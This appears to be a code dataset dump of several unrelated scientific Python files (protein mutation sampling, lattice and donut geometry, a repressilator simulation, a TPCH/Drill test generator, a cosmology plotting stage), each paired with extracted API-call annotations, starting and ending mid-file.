utils.get_top_n_mutation_pairs(landscape.epistasis_tensor, top_k, lowest=not adaptive) if max_reuse is not None: assert max_reuse > 0 mutation_pairs = filter_mutation_set_by_position(mutation_pairs, limit=max_reuse) print(f'{len(mutation_pairs)} after filtering {top_k}') num_rounds = distance // 2 all_combined = combine_k_rounds(num_rounds, mutation_pairs) all_combined = [element for element in all_combined if len(element) == distance] if len(all_combined) < n: raise ValueError(f'Not enough ({len(all_combined)} < {n}) mutants at distance {distance}, try increasing `top_k`.') # TODO(nthomas) after switching to np.random.Generator, we can do rng.choice(all_combined) subset_idxs = random_state.choice(len(all_combined), n, replace=False) subset = [all_combined[i] for i in subset_idxs] seqs = [utils.apply_mutations(landscape.wildtype_sequence, m) for m in subset] return seqs
[ "utils.apply_mutations", "numpy.random.RandomState", "utils.merge_multiple_mutation_sets", "itertools.combinations", "collections.Counter", "utils.get_top_n_mutation_pairs" ]
[((2032, 2081), 'itertools.combinations', 'itertools.combinations', (['mutations', '(num_rounds + 1)'], {}), '(mutations, num_rounds + 1)\n', (2054, 2081), False, 'import itertools\n'), ((2514, 2523), 'collections.Counter', 'Counter', ([], {}), '()\n', (2521, 2523), False, 'from collections import Counter\n'), ((3273, 3297), 'numpy.random.RandomState', 'np.random.RandomState', (['(0)'], {}), '(0)\n', (3294, 3297), True, 'import numpy as np\n'), ((4589, 4680), 'utils.get_top_n_mutation_pairs', 'utils.get_top_n_mutation_pairs', (['landscape.epistasis_tensor', 'top_k'], {'lowest': '(not adaptive)'}), '(landscape.epistasis_tensor, top_k, lowest=\n not adaptive)\n', (4619, 4680), False, 'import utils\n'), ((5425, 5478), 'utils.apply_mutations', 'utils.apply_mutations', (['landscape.wildtype_sequence', 'm'], {}), '(landscape.wildtype_sequence, m)\n', (5446, 5478), False, 'import utils\n'), ((2178, 2234), 'utils.merge_multiple_mutation_sets', 'utils.merge_multiple_mutation_sets', (['mutation_combination'], {}), '(mutation_combination)\n', (2212, 2234), False, 'import utils\n')]
import numpy as np def cubic_lattice(N): array = np.arange(N) xs, ys, zs = np.meshgrid(array, array, array) return np.vstack((xs.flatten(), ys.flatten(), zs.flatten())).T def donut(inner_r, outer_r, height=5, point_density=24, n_viewpoints=60, offset=1e-3): assert(isinstance(height, int)) assert(outer_r > inner_r) # generate points on the xz-plane def round_points(thetas): return np.vstack([ np.cos(thetas), np.zeros(thetas.shape[0]), np.sin(thetas) ]).T def rings(level_y): thetas = np.linspace(0, 2 * np.pi, point_density + 1)[:-1] inner = inner_r * round_points(thetas) outer = outer_r * round_points(thetas) inner[:, 1] = level_y outer[:, 1] = level_y return np.vstack((inner, outer)) point_ys = np.arange(height) points = np.vstack([rings(level_y) for level_y in point_ys]) camera_r = (inner_r + outer_r) / 2. camera_y = (point_ys[0] + point_ys[-1]) / 2. # add offset to avoid division by zero at projection thetas = np.linspace(0, 2 * np.pi, n_viewpoints + 1)[:-1] + offset camera_locations = camera_r * round_points(thetas) camera_locations[:, 1] = camera_y camera_omegas = np.vstack(( np.zeros(n_viewpoints), -thetas, np.zeros(n_viewpoints) )).T return camera_omegas, camera_locations, points
[ "numpy.meshgrid", "numpy.zeros", "numpy.sin", "numpy.arange", "numpy.linspace", "numpy.cos", "numpy.vstack" ]
[((55, 67), 'numpy.arange', 'np.arange', (['N'], {}), '(N)\n', (64, 67), True, 'import numpy as np\n'), ((85, 117), 'numpy.meshgrid', 'np.meshgrid', (['array', 'array', 'array'], {}), '(array, array, array)\n', (96, 117), True, 'import numpy as np\n'), ((856, 873), 'numpy.arange', 'np.arange', (['height'], {}), '(height)\n', (865, 873), True, 'import numpy as np\n'), ((814, 839), 'numpy.vstack', 'np.vstack', (['(inner, outer)'], {}), '((inner, outer))\n', (823, 839), True, 'import numpy as np\n'), ((595, 639), 'numpy.linspace', 'np.linspace', (['(0)', '(2 * np.pi)', '(point_density + 1)'], {}), '(0, 2 * np.pi, point_density + 1)\n', (606, 639), True, 'import numpy as np\n'), ((1100, 1143), 'numpy.linspace', 'np.linspace', (['(0)', '(2 * np.pi)', '(n_viewpoints + 1)'], {}), '(0, 2 * np.pi, n_viewpoints + 1)\n', (1111, 1143), True, 'import numpy as np\n'), ((1292, 1314), 'numpy.zeros', 'np.zeros', (['n_viewpoints'], {}), '(n_viewpoints)\n', (1300, 1314), True, 'import numpy as np\n'), ((1341, 1363), 'numpy.zeros', 'np.zeros', (['n_viewpoints'], {}), '(n_viewpoints)\n', (1349, 1363), True, 'import numpy as np\n'), ((458, 472), 'numpy.cos', 'np.cos', (['thetas'], {}), '(thetas)\n', (464, 472), True, 'import numpy as np\n'), ((486, 511), 'numpy.zeros', 'np.zeros', (['thetas.shape[0]'], {}), '(thetas.shape[0])\n', (494, 511), True, 'import numpy as np\n'), ((525, 539), 'numpy.sin', 'np.sin', (['thetas'], {}), '(thetas)\n', (531, 539), True, 'import numpy as np\n')]
# example-3.18-repressilator.py - Transcriptional regulation # RMM, 29 Aug 2021 # # Figure 3.26: The repressilator genetic regulatory network. (a) A schematic # diagram of the repressilator, showing the layout of the genes in the # plasmid that holds the circuit as well as the circuit diagram # (center). (b) A simulation of a simple model for the repressilator, # showing the oscillation of the individual protein concentrations. # import control as ct import numpy as np import matplotlib.pyplot as plt # # Repressilator dynamics # # This function implements the basic model of the repressilator All # parameter values were taken from Nature. 2000 Jan 20; 403(6767):335-8. # # This model was developed by members of the 2003 Synthetic Biology Class # on Engineered Blinkers. # # Dynamics for the repressilator def repressilator(t, x, u, params): # store the state variables under more meaningful names mRNA_cI = x[0] mRNA_lacI = x[1] mRNA_tetR = x[2] protein_cI = x[3] protein_lacI = x[4] protein_tetR = x[5] # # set the parameter values # # set the max transcription rate in transcripts per second k_transcription_cI = params.get('k_transcription_cI', 0.5) k_transcription_lacI = params.get('k_transcription_lacI', 0.5) k_transcription_tetR = params.get('k_transcription_tetR', 0.5) # set the leakage transcription rate (ie transcription rate if # promoter region bound by repressor) in transcripts per second k_transcription_leakage = params.get('k_transcription_leakage', 5e-4) # Set the mRNA and protein degradation rates (per second) mRNA_half_life = params.get('mRNA_half_life', 120) # in seconds k_mRNA_degradation = np.log(2)/mRNA_half_life protein_half_life = params.get('protein_half_life', 600) # in seconds k_protein_degradation = np.log(2)/protein_half_life # proteins per transcript lifespan translation_efficiency = params.get('translation_efficiency', 20) average_mRNA_lifespan = 1/k_mRNA_degradation # proteins per transcript per sec k_translation = translation_efficiency/average_mRNA_lifespan # set the Hill coefficients of the repressors n_tetR = params.get('n_tetR', 2) n_cI = params.get('n_cI', 2) n_lacI = params.get('n_lacI', 2) # Set the dissociation constant for the repressors to their target promoters # in per molecule per second KM_tetR = params.get('KM_tetR', 40) KM_cI = params.get('KM_cI', 40) KM_lacI = params.get('KM_lacI', 40) # the differential equations governing the state variables: # mRNA concentration = transcription given repressor concentration - # mRNA degradation + transcription leakage dxdt = np.empty(6) dxdt[0] = k_transcription_cI/(1 + (protein_tetR / KM_tetR) ** n_tetR) - \ k_mRNA_degradation * mRNA_cI + k_transcription_leakage dxdt[1] = k_transcription_lacI/(1 + (protein_cI / KM_cI)**n_cI) - \ k_mRNA_degradation * mRNA_lacI + k_transcription_leakage dxdt[2] = k_transcription_tetR/(1 + (protein_lacI / KM_lacI) ** n_lacI) - \ k_mRNA_degradation * mRNA_tetR + k_transcription_leakage # protein concentration = translation - protein degradation dxdt[3] = k_translation*mRNA_cI - k_protein_degradation*protein_cI dxdt[4] = k_translation*mRNA_lacI - k_protein_degradation*protein_lacI dxdt[5] = k_translation*mRNA_tetR - k_protein_degradation*protein_tetR return dxdt # Define the system as an I/O system sys = ct.NonlinearIOSystem( updfcn=repressilator, outfcn=lambda t, x, u, params: x[3:], states=6, inputs=0, outputs=3) # Set up the plotting grid to match the layout in the book fig = plt.figure(constrained_layout=True) gs = fig.add_gridspec(2, 2) # # (b) A simulation of a simple model for the repressilator, showing the # oscillation of the individual protein concentrations. # fig.add_subplot(gs[0, 1]) # first row, second column # Initial conditions and time t = np.linspace(0, 20000, 1000) x0 = [1, 0, 0, 200, 0, 0] # Integrate the differential equation response = ct.input_output_response(sys, t, 0, x0) # Plot the results (protein concentrations) plt.plot(response.time/60, response.outputs[0], '-') plt.plot(response.time/60, response.outputs[1], '--') plt.plot(response.time/60, response.outputs[2], '-.') plt.axis([0, 300, 0, 5000]) plt.legend(("cI", "lacI", "tetR"), loc='upper right') plt.xlabel("Time [min]") # Axis labels plt.ylabel("Proteins per cell") plt.title("Repressilator simulation") # Plot title # Save the figure plt.savefig("figure-3.26-repressilator_dynamics.png", bbox_inches='tight')
[ "matplotlib.pyplot.title", "control.NonlinearIOSystem", "numpy.log", "matplotlib.pyplot.plot", "numpy.empty", "matplotlib.pyplot.legend", "matplotlib.pyplot.axis", "matplotlib.pyplot.figure", "numpy.linspace", "control.input_output_response", "matplotlib.pyplot.ylabel", "matplotlib.pyplot.xlabel", "matplotlib.pyplot.savefig" ]
[((3513, 3629), 'control.NonlinearIOSystem', 'ct.NonlinearIOSystem', ([], {'updfcn': 'repressilator', 'outfcn': '(lambda t, x, u, params: x[3:])', 'states': '(6)', 'inputs': '(0)', 'outputs': '(3)'}), '(updfcn=repressilator, outfcn=lambda t, x, u, params: x\n [3:], states=6, inputs=0, outputs=3)\n', (3533, 3629), True, 'import control as ct\n'), ((3700, 3735), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'constrained_layout': '(True)'}), '(constrained_layout=True)\n', (3710, 3735), True, 'import matplotlib.pyplot as plt\n'), ((3992, 4019), 'numpy.linspace', 'np.linspace', (['(0)', '(20000)', '(1000)'], {}), '(0, 20000, 1000)\n', (4003, 4019), True, 'import numpy as np\n'), ((4096, 4135), 'control.input_output_response', 'ct.input_output_response', (['sys', 't', '(0)', 'x0'], {}), '(sys, t, 0, x0)\n', (4120, 4135), True, 'import control as ct\n'), ((4181, 4235), 'matplotlib.pyplot.plot', 'plt.plot', (['(response.time / 60)', 'response.outputs[0]', '"""-"""'], {}), "(response.time / 60, response.outputs[0], '-')\n", (4189, 4235), True, 'import matplotlib.pyplot as plt\n'), ((4234, 4289), 'matplotlib.pyplot.plot', 'plt.plot', (['(response.time / 60)', 'response.outputs[1]', '"""--"""'], {}), "(response.time / 60, response.outputs[1], '--')\n", (4242, 4289), True, 'import matplotlib.pyplot as plt\n'), ((4288, 4343), 'matplotlib.pyplot.plot', 'plt.plot', (['(response.time / 60)', 'response.outputs[2]', '"""-."""'], {}), "(response.time / 60, response.outputs[2], '-.')\n", (4296, 4343), True, 'import matplotlib.pyplot as plt\n'), ((4343, 4370), 'matplotlib.pyplot.axis', 'plt.axis', (['[0, 300, 0, 5000]'], {}), '([0, 300, 0, 5000])\n', (4351, 4370), True, 'import matplotlib.pyplot as plt\n'), ((4371, 4424), 'matplotlib.pyplot.legend', 'plt.legend', (["('cI', 'lacI', 'tetR')"], {'loc': '"""upper right"""'}), "(('cI', 'lacI', 'tetR'), loc='upper right')\n", (4381, 4424), True, 'import matplotlib.pyplot as plt\n'), ((4426, 4450), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Time [min]"""'], {}), "('Time [min]')\n", (4436, 4450), True, 'import matplotlib.pyplot as plt\n'), ((4488, 4519), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Proteins per cell"""'], {}), "('Proteins per cell')\n", (4498, 4519), True, 'import matplotlib.pyplot as plt\n'), ((4520, 4557), 'matplotlib.pyplot.title', 'plt.title', (['"""Repressilator simulation"""'], {}), "('Repressilator simulation')\n", (4529, 4557), True, 'import matplotlib.pyplot as plt\n'), ((4600, 4674), 'matplotlib.pyplot.savefig', 'plt.savefig', (['"""figure-3.26-repressilator_dynamics.png"""'], {'bbox_inches': '"""tight"""'}), "('figure-3.26-repressilator_dynamics.png', bbox_inches='tight')\n", (4611, 4674), True, 'import matplotlib.pyplot as plt\n'), ((2731, 2742), 'numpy.empty', 'np.empty', (['(6)'], {}), '(6)\n', (2739, 2742), True, 'import numpy as np\n'), ((1723, 1732), 'numpy.log', 'np.log', (['(2)'], {}), '(2)\n', (1729, 1732), True, 'import numpy as np\n'), ((1853, 1862), 'numpy.log', 'np.log', (['(2)'], {}), '(2)\n', (1859, 1862), True, 'import numpy as np\n')]
import argparse import re import sys import numpy as np import pandas as pd import tpch from pydrill.client import PyDrill def get_table_occurrences(query): # [ y for y in a if y not in b] return [name for name in tpch.tableNames if name in query.split()] def replace_all(text, dic): for i, j in dic.items(): text = re.sub(r"\s%s(\s|$)" % i, j, text) return text def get_blazingsql_query(db_name, query): new_query = query for table_name in get_table_occurrences(query): new_query = replace_all( new_query, {table_name: " %(table)s " % {"table": db_name + "." + table_name}}, ) return new_query def get_drill_query(query): new_query = query for table_name in get_table_occurrences(query): new_query = replace_all( new_query, {table_name: " dfs.tmp.`%(table)s` " % {"table": table_name}} ) return new_query def get_reference_input(drill, root_path, test_name, query): table_names = get_table_occurrences(query) table_inputs = [] for table_name in table_names: file_path = root_path + table_name + ".psv" table = tpch.tables[table_name] db_name = "main" table_inputs.append( """{ "dbName": "%(db_name)s", "tableName": "%(table_name)s", "filePath": "%(file_path)s", "columnNames": %(column_names)s, "columnTypes": %(column_types)s }""" % { "db_name": db_name, "table_name": table_name, "file_path": file_path, "column_names": get_column_names(table), "column_types": get_column_types(table), } ) drill_query = get_drill_query(query) print("\t#drill_query: ", drill_query) return ( ( """ { "testName": "%(test_name)s", "query": "%(query)s", "tables": [%(table_inputs)s], "result": %(result)s, "resultTypes": %(result_types)s, "resultColumnNames": %(result_names)s } """ ) % { "test_name": test_name, "query": get_blazingsql_query(db_name, query), "table_inputs": ",".join(table_inputs), "result": get_reference_result(drill, table, drill_query), "result_types": get_reference_result_types(drill, table, drill_query), "result_names": get_reference_result_names(drill, table, drill_query), } ) def get_reference_result_names(drill, table, query_str): query_result = drill.query(query_str) return "[%s]" % (",".join(['"%s"' % name for name in query_result.columns])) def get_reference_result(drill, table, query_str): query_result = drill.query(query_str) df = query_result.to_dataframe() items = [] for column in query_result.columns: s = "[%s]" % ( ",".join( [ "-1" if item is None else "1" if item is True else "0" if item is False else item for item in np.asarray(df[column]) ] ) ) items.append(s) return "[%s]" % (",".join(items)) def get_reference_result_types(drill, table, query_str): query_result = drill.query(query_str) df = query_result.to_dataframe() for col in query_result.columns: df[col] = pd.to_numeric(df[col], errors="coerce") def get_dtype(dtype): if pd.api.types.is_categorical_dtype(dtype): return "GDF_INT8" dicc = { np.float64: "GDF_FLOAT64", np.float32: "GDF_FLOAT32", np.int64: "GDF_INT64", np.int32: "GDF_INT32", np.int16: "GDF_INT16", np.int8: "GDF_INT8", np.bool_: "GDF_INT8", np.datetime64: "GDF_DATE64", np.object: "GDF_INT64", } _type = np.dtype(dtype).type if _type in dicc: return dicc[_type] return "GDF_INT64" return "[%s]" % ( ",".join( ['"%s"' % get_dtype(df[column].dtype) for column in query_result.columns]) ) def get_gdf_type(table, column_name): types = { "double": "GDF_FLOAT64", "float": "GDF_FLOAT32", "long": "GDF_INT64", "int": "GDF_INT32", "short": "GDF_INT32", "char": "GDF_INT8", "date": "GDF_DATE64", } t = table.get(column_name) if t in types: return types[t] return "GDF_UNDEFINED" def get_column_names(table): return "[%s]" % ( ",".join( ['"%s"' % _name for _name, _type in table.items()])) def get_column_types(table): return "[%s]" % ( ",".join( ['"%s"' % gdf_type(native_type(_type)) for _name, _type in table.items()] ) ) def native_type(type_name): # to conver string(xyz) to string if type_name.find("string") != -1: return "string" else: return type_name def gdf_type(type_name): return { "double": "GDF_FLOAT64", "float": "GDF_FLOAT32", "long": "GDF_INT64", "int": "GDF_INT32", "short": "GDF_INT32", "char": "GDF_INT8", "date": "GDF_INT64", "string": "GDF_STRING", }[type_name] def get_selected_columns(table): # [ y for y in a if y not in b] return [ _name for _name, _type in table.items() if _type.find('string') == - 1] def write(json_list): def to(filename): with sys.stdout if '-' == filename else open(filename, 'w') as output: output.write('[%s]' % (','.join([item for item in json_list]))) return type('writer', (), dict(to=to)) def generate_json_input(drill, tpch_path, your_queries, output): print("# OUTPUT \t", output) json_list = [] for index, query in enumerate(your_queries): print("## processing...\t", query) json_text = get_reference_input(drill, tpch_path, "TEST_0%s" % index, query) json_list.append(json_text) write(json_list).to(output) if __name__ == "__main__": drill = PyDrill(host="localhost", port=8047) if not drill.is_active(): raise Exception("Please run Drill first") parser = argparse.ArgumentParser( description="Generate Input Generator for UnitTestGenerator." ) parser.add_argument( "tpch_path", type=str, help="use complete path, ex /tmp/tpch/1mb/" ) parser.add_argument( "-O", "--output", type=str, default="-", help="Output file path or - for stdout" ) args = parser.parse_args() tpch_path = args.tpch_path tpch.init_schema(drill, tpch_path) your_queries = ["""select c_custkey, c_nationkey, c_acctbal from customer where c_custkey < 15""", ] generate_json_input(drill, tpch_path, your_queries, args.output)
[ "argparse.ArgumentParser", "tpch.init_schema", "numpy.asarray", "numpy.dtype", "pydrill.client.PyDrill", "pandas.api.types.is_categorical_dtype", "re.sub", "pandas.to_numeric" ]
[((6477, 6513), 'pydrill.client.PyDrill', 'PyDrill', ([], {'host': '"""localhost"""', 'port': '(8047)'}), "(host='localhost', port=8047)\n", (6484, 6513), False, 'from pydrill.client import PyDrill\n'), ((6608, 6699), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Generate Input Generator for UnitTestGenerator."""'}), "(description=\n 'Generate Input Generator for UnitTestGenerator.')\n", (6631, 6699), False, 'import argparse\n'), ((7010, 7044), 'tpch.init_schema', 'tpch.init_schema', (['drill', 'tpch_path'], {}), '(drill, tpch_path)\n', (7026, 7044), False, 'import tpch\n'), ((340, 375), 're.sub', 're.sub', (["('\\\\s%s(\\\\s|$)' % i)", 'j', 'text'], {}), "('\\\\s%s(\\\\s|$)' % i, j, text)\n", (346, 375), False, 'import re\n'), ((3680, 3719), 'pandas.to_numeric', 'pd.to_numeric', (['df[col]'], {'errors': '"""coerce"""'}), "(df[col], errors='coerce')\n", (3693, 3719), True, 'import pandas as pd\n'), ((3758, 3798), 'pandas.api.types.is_categorical_dtype', 'pd.api.types.is_categorical_dtype', (['dtype'], {}), '(dtype)\n', (3791, 3798), True, 'import pandas as pd\n'), ((4200, 4215), 'numpy.dtype', 'np.dtype', (['dtype'], {}), '(dtype)\n', (4208, 4215), True, 'import numpy as np\n'), ((3358, 3380), 'numpy.asarray', 'np.asarray', (['df[column]'], {}), '(df[column])\n', (3368, 3380), True, 'import numpy as np\n')]
from bbpipe import PipelineStage from .types import FitsFile, DirFile, HTMLFile, NpzFile import sacc import numpy as np import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt import dominate as dom import dominate.tags as dtg import os class BBPlotter(PipelineStage): name="BBPlotter" inputs=[('cells_coadded_total', FitsFile), ('cells_coadded', FitsFile), ('cells_noise', FitsFile), ('cells_null', FitsFile), ('cells_fiducial', FitsFile), ('param_chains',NpzFile)] outputs=[('plots',DirFile), ('plots_page',HTMLFile)] config_options={'lmax_plot':300, 'plot_coadded_total': True, 'plot_noise': True, 'plot_nulls': True, 'plot_likelihood': True} def create_page(self): # Open plots directory if not os.path.isdir(self.get_output('plots')): os.mkdir(self.get_output('plots')) # Create HTML page self.doc = dom.document(title='BBPipe plots page') with self.doc.head: dtg.link(rel='stylesheet', href='style.css') dtg.script(type='text/javascript', src='script.js') with self.doc: dtg.h1("Pipeline outputs") dtg.h2("Contents:",id='contents') lst=dtg.ul() lst+=dtg.li(dtg.a('Bandpasses',href='#bandpasses')) lst+=dtg.li(dtg.a('Coadded power spectra',href='#coadded')) if self.config['plot_nulls']: lst+=dtg.li(dtg.a('Null tests',href='#nulls')) if self.config['plot_likelihood']: lst+=dtg.li(dtg.a('Likelihood',href='#like')) def add_bandpasses(self): with self.doc: dtg.h2("Bandpasses",id='bandpasses') lst=dtg.ul() # Overall plot title='Bandpasses summary' fname=self.get_output('plots')+'/bpass_summary.png' plt.figure() plt.title(title,fontsize=14) for n, t in self.s_fid.tracers.items(): nu_mean=np.sum(t.bandpass*t.nu**3)/np.sum(t.bandpass*t.nu**2) plt.plot(t.nu,t.bandpass/np.amax(t.bandpass),label=n+', $\\langle\\nu\\rangle=%.1lf\\,{\\rm GHz}$'%nu_mean) plt.xlabel('$\\nu\\,[{\\rm GHz}]$',fontsize=14) plt.ylabel('Transmission',fontsize=14) plt.ylim([0.,1.3]) plt.legend(frameon=0,ncol=2,labelspacing=0.1,loc='upper left') plt.xscale('log') plt.savefig(fname,bbox_inches='tight') plt.close() lst+=dtg.li(dtg.a(title,href=fname)) for n, t in self.s_fid.tracers.items(): title='Bandpass '+n fname=self.get_output('plots')+'/bpass_'+n+'.png' plt.figure() plt.title(title,fontsize=14) plt.plot(t.nu,t.bandpass/np.amax(t.bandpass)) plt.xlabel('$\\nu\\,[{\\rm GHz}]$',fontsize=14) plt.ylabel('Transmission',fontsize=14) plt.ylim([0.,1.05]) plt.savefig(fname,bbox_inches='tight') plt.close() lst+=dtg.li(dtg.a(title,href=fname)) dtg.div(dtg.a('Back to TOC',href='#contents')) def add_coadded(self): with self.doc: dtg.h2("Coadded power spectra",id='coadded') lst=dtg.ul() pols = ['e', 'b'] print(self.s_fid.tracers) for t1, t2 in self.s_cd_x.get_tracer_combinations(): for p1 in range(2): if t1==t2: p2range = range(p1, 2) else: p2range = range(2) for p2 in p2range: x = pols[p1] + pols[p2] typ = 'cl_' + x # Plot title title = f"{t1} x {t2}, {typ}" # Plot file fname =self.get_output('plots')+'/cls_' fname+= f"{t1}_x_{t2}_{typ}.png" print(fname) plt.figure() plt.title(title, fontsize=14) l, cl = self.s_fid.get_ell_cl(typ, t1, t2) plt.plot(l[l<self.lmx], cl[l<self.lmx], 'k-', label='Fiducial model') if self.config['plot_coadded_total']: l, cl, cov = self.s_cd_t.get_ell_cl(typ, t1, t2, return_cov=True) msk = l<self.lmx el = np.sqrt(np.fabs(np.diag(cov)))[msk] plt.errorbar(l[msk], cl[msk], yerr=el, fmt='ro', label='Total coadd') eb=plt.errorbar(l[msk]+1, -cl[msk], yerr=el, fmt='ro', mfc='white') eb[-1][0].set_linestyle('--') if self.config['plot_noise']: l, cl, cov = self.s_cd_n.get_ell_cl(typ, t1, t2, return_cov=True) msk = l<self.lmx el = np.sqrt(np.fabs(np.diag(cov)))[msk] plt.errorbar(l[msk], cl[msk], yerr=el, fmt='yo', label='Noise') eb=plt.errorbar(l[msk]+1, -cl[msk], yerr=el, fmt='yo', mfc='white') eb[-1][0].set_linestyle('--') l, cl, cov = self.s_cd_x.get_ell_cl(typ, t1, t2, return_cov=True) msk = l<self.lmx el = np.sqrt(np.fabs(np.diag(cov)))[msk] plt.errorbar(l[msk], cl[msk], yerr=el, fmt='bo', label='Cross-coadd') eb=plt.errorbar(l[msk]+1, -cl[msk], yerr=el, fmt='bo', mfc='white') eb[-1][0].set_linestyle('--') plt.yscale('log') plt.xlabel('$\\ell$',fontsize=15) if self.config['compute_dell']: plt.ylabel('$D_\\ell$',fontsize=15) else: plt.ylabel('$C_\\ell$',fontsize=15) plt.legend() plt.savefig(fname,bbox_inches='tight') plt.close() lst+=dtg.li(dtg.a(title,href=fname)) dtg.div(dtg.a('Back to TOC',href='#contents')) def add_nulls(self): with self.doc: dtg.h2("Null tests",id='nulls') lst=dtg.ul() pols = ['e', 'b'] for t1, t2 in self.s_null.get_tracer_combinations(): title = f"{t1} x {t2}" fname =self.get_output('plots')+'/cls_null_' fname+= f"{t1}_x_{t2}.png" print(fname) plt.figure() plt.title(title,fontsize=15) for p1 in range(2): for p2 in range(2): x = pols[p1] + pols[p2] typ='cl_'+x l, cl, cv = self.s_null.get_ell_cl(typ, t1, t2, return_cov=True) msk = l<self.lmx el = np.sqrt(np.fabs(np.diag(cv)))[msk] plt.errorbar(l[msk], cl[msk]/el, yerr=np.ones_like(el), fmt=self.cols_typ[x]+'-', label=x) plt.xlabel('$\\ell$',fontsize=15) plt.ylabel('$C_\\ell/\\sigma_\\ell$',fontsize=15) plt.legend() plt.savefig(fname,bbox_index='tight') plt.close() lst+=dtg.li(dtg.a(title,href=fname)) dtg.div(dtg.a('Back to TOC',href='#contents')) def add_contours(self): from getdist import MCSamples from getdist import plots as gplots with self.doc: dtg.h2("Likelihood",id='like') lst=dtg.ul() # Labels and true values labdir={'A_lens':'A_{\\rm lens}', 'r_tensor':'r', 'beta_d':'\\beta_d', 'epsilon_ds':'\\epsilon_{ds}', 'alpha_d_bb':'\\alpha_d', 'amp_d_bb':'A_d', 'beta_s':'\\beta_s', 'alpha_s_bb':'\\alpha_s', 'amp_s_bb':'A_s'} # TODO: we need to build this from the priors, I think. truth={'A_lens':1., 'r_tensor':0., 'beta_d':1.59, 'epsilon_ds':0., 'alpha_d_bb':-0.2, 'amp_d_bb':5., 'beta_s':-3., 'alpha_s_bb':-0.4, 'amp_s_bb':2.} # Select only parameters for which we have labels names_common=list(set(list(self.chain['names'])) & truth.keys()) msk_common=np.array([n in names_common for n in self.chain['names']]) npar=len(names_common) nwalk,nsamp,npar_chain=self.chain['chain'].shape chain=self.chain['chain'][:,nsamp//4:,:].reshape([-1,npar_chain])[:,msk_common] names_common=np.array(self.chain['names'])[msk_common] # Getdist samples=MCSamples(samples=chain, names=names_common, labels=[labdir[n] for n in names_common]) g = gplots.getSubplotPlotter() g.triangle_plot([samples], filled=True) for i,n in enumerate(names_common): v=truth[n] g.subplots[i,i].plot([v,v],[0,1],'r-') for j in range(i+1,npar): u=truth[names_common[j]] g.subplots[j,i].plot([v],[u],'ro') # Save fname=self.get_output('plots')+'/triangle.png' g.export(fname) lst+=dtg.li(dtg.a("Likelihood contours",href=fname)) dtg.div(dtg.a('Back to TOC',href='#contents')) def write_page(self): with open(self.get_output('plots_page'),'w') as f: f.write(self.doc.render()) def read_inputs(self): print("Reading inputs") # Power spectra self.s_fid=sacc.Sacc.load_fits(self.get_input('cells_fiducial')) self.s_cd_x=sacc.Sacc.load_fits(self.get_input('cells_coadded')) if self.config['plot_coadded_total']: self.s_cd_t=sacc.Sacc.load_fits(self.get_input('cells_coadded_total')) if self.config['plot_noise']: self.s_cd_n=sacc.Sacc.load_fits(self.get_input('cells_noise')) if self.config['plot_nulls']: self.s_null=sacc.Sacc.load_fits(self.get_input('cells_null')) # Chains if self.config['plot_likelihood']: self.chain=np.load(self.get_input('param_chains')) self.cols_typ={'ee':'r','eb':'g','be':'y','bb':'b'} self.lmx = self.config['lmax_plot'] def run(self): self.read_inputs() self.create_page() self.add_bandpasses() self.add_coadded() if self.config['plot_nulls']: self.add_nulls() if self.config['plot_likelihood']: self.add_contours() self.write_page() if __name__ == '__main_': cls = PipelineStage.main()
[ "matplotlib.pyplot.title", "matplotlib.pyplot.yscale", "numpy.sum", "bbpipe.PipelineStage.main", "matplotlib.pyplot.figure", "getdist.MCSamples", "numpy.diag", "matplotlib.pyplot.close", "dominate.tags.link", "matplotlib.pyplot.errorbar", "dominate.tags.h1", "numpy.ones_like", "matplotlib.pyplot.ylim", "matplotlib.pyplot.legend", "dominate.tags.a", "getdist.plots.getSubplotPlotter", "matplotlib.use", "dominate.tags.h2", "matplotlib.pyplot.ylabel", "matplotlib.pyplot.xscale", "matplotlib.pyplot.plot", "dominate.document", "numpy.amax", "dominate.tags.script", "numpy.array", "matplotlib.pyplot.xlabel", "dominate.tags.ul", "matplotlib.pyplot.savefig" ]
[((138, 159), 'matplotlib.use', 'matplotlib.use', (['"""Agg"""'], {}), "('Agg')\n", (152, 159), False, 'import matplotlib\n'), ((11386, 11406), 'bbpipe.PipelineStage.main', 'PipelineStage.main', ([], {}), '()\n', (11404, 11406), False, 'from bbpipe import PipelineStage\n'), ((952, 991), 'dominate.document', 'dom.document', ([], {'title': '"""BBPipe plots page"""'}), "(title='BBPipe plots page')\n", (964, 991), True, 'import dominate as dom\n'), ((1032, 1076), 'dominate.tags.link', 'dtg.link', ([], {'rel': '"""stylesheet"""', 'href': '"""style.css"""'}), "(rel='stylesheet', href='style.css')\n", (1040, 1076), True, 'import dominate.tags as dtg\n'), ((1089, 1140), 'dominate.tags.script', 'dtg.script', ([], {'type': '"""text/javascript"""', 'src': '"""script.js"""'}), "(type='text/javascript', src='script.js')\n", (1099, 1140), True, 'import dominate.tags as dtg\n'), ((1176, 1202), 'dominate.tags.h1', 'dtg.h1', (['"""Pipeline outputs"""'], {}), "('Pipeline outputs')\n", (1182, 1202), True, 'import dominate.tags as dtg\n'), ((1215, 1249), 'dominate.tags.h2', 'dtg.h2', (['"""Contents:"""'], {'id': '"""contents"""'}), "('Contents:', id='contents')\n", (1221, 1249), True, 'import dominate.tags as dtg\n'), ((1265, 1273), 'dominate.tags.ul', 'dtg.ul', ([], {}), '()\n', (1271, 1273), True, 'import dominate.tags as dtg\n'), ((1690, 1727), 'dominate.tags.h2', 'dtg.h2', (['"""Bandpasses"""'], {'id': '"""bandpasses"""'}), "('Bandpasses', id='bandpasses')\n", (1696, 1727), True, 'import dominate.tags as dtg\n'), ((1743, 1751), 'dominate.tags.ul', 'dtg.ul', ([], {}), '()\n', (1749, 1751), True, 'import dominate.tags as dtg\n'), ((1894, 1906), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (1904, 1906), True, 'import matplotlib.pyplot as plt\n'), ((1919, 1948), 'matplotlib.pyplot.title', 'plt.title', (['title'], {'fontsize': '(14)'}), '(title, fontsize=14)\n', (1928, 1948), True, 'import matplotlib.pyplot as plt\n'), ((2214, 2262), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""$\\\\nu\\\\,[{\\\\rm GHz}]$"""'], {'fontsize': '(14)'}), "('$\\\\nu\\\\,[{\\\\rm GHz}]$', fontsize=14)\n", (2224, 2262), True, 'import matplotlib.pyplot as plt\n'), ((2274, 2313), 